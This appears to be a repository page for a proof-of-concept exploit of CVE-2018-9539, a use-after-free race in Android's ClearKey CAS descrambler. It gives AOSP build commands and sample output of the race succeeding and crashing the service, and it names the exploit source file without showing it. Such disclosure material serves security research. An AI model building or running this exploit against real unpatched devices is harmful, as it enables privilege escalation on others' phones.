
CVE-2018-9539 PoC — Android ClearKey CAS descrambler permission and access control vulnerability

Associated Vulnerability
Title: Android ClearKey CAS descrambler permission and access control vulnerability (CVE-2018-9539)
Description: Android is an open-source operating system based on Linux, developed jointly by Google and the Open Handset Alliance (OHA). The ClearKey CAS descrambler is one of its descrambler components. The ClearKey CAS descrambler in Android 8.0, 8.1 and 9 contains a privilege escalation vulnerability. An attacker can exploit it to gain elevated privileges (use-after-free).
Description
 PoC code for CVE-2018-9539
Readme
# CVE-2018-9539

Proof-of-concept code for CVE-2018-9539

If you have any questions, you are welcome to DM me on Twitter ([@tamir_zb](https://twitter.com/tamir_zb)).

## Build

In order to build this:

1. [Download the Android source code](https://source.android.com/setup/build/downloading).
2. Put this repository in `AOSP/external`.
3. Run the following commands:

```
cd AOSP
source build/envsetup.sh
make cas_race_uaf
```

## Result

Running this PoC against an unpatched version of Android (8.1-9.0 before November 2018) should result in a use-after-free. Note that this PoC is not really intended to run on Android 8.1: it expects the UaF to crash the service, which only happens on Android 9.0, so on Android 8.1 the PoC will loop indefinitely.

Here is example output from running this PoC on Android 9.0:

```
Objects prepared

Attempt #1:
Sessions prepared
Descrambler session set to session1
Threads prepared
Running threads...
Descrambler session set to session2
Thread #0 result: session2
Thread #1 result: session2
Thread #2 result: session2
Thread #3 result: session2
Thread #4 result: session2
Attempt #1 failed, retrying...

Attempt #2:
Sessions prepared
Descrambler session set to session1
Threads prepared
Running threads...
Descrambler session set to session2
Thread #0 result: session2
Thread #1 result: session2
Thread #2 result: session2
Thread #3 result: session2
Thread #4 result: session2
Attempt #2 failed, retrying...

...
...
...

Attempt #204:
Sessions prepared
Descrambler session set to session1
Threads prepared
Running threads...
Descrambler session set to session2
Thread #0 result: session2
Thread #1 result: session2
Thread #2 result: session2
Thread #3 result: session2
Thread #4 result: session2
Attempt #204 failed, retrying...

Attempt #205:
Sessions prepared
Descrambler session set to session1
Threads prepared
Running threads...
Descrambler session set to session2
Thread #0 result: session1
Thread #1 result: session2
Thread #2 result: session2
Thread #3 result: CRASHED :)

Succeeded in 205 attempts
```
File Snapshot

```
[4.0K] /data/pocs/290c55f3b2fa997bdc19b15a7080ae7d39113966
├── [ 353] Android.mk
├── [7.4K] cas_race_uaf.cpp
├── [ 34K] LICENSE
└── [2.0K] README.md

0 directories, 4 files
```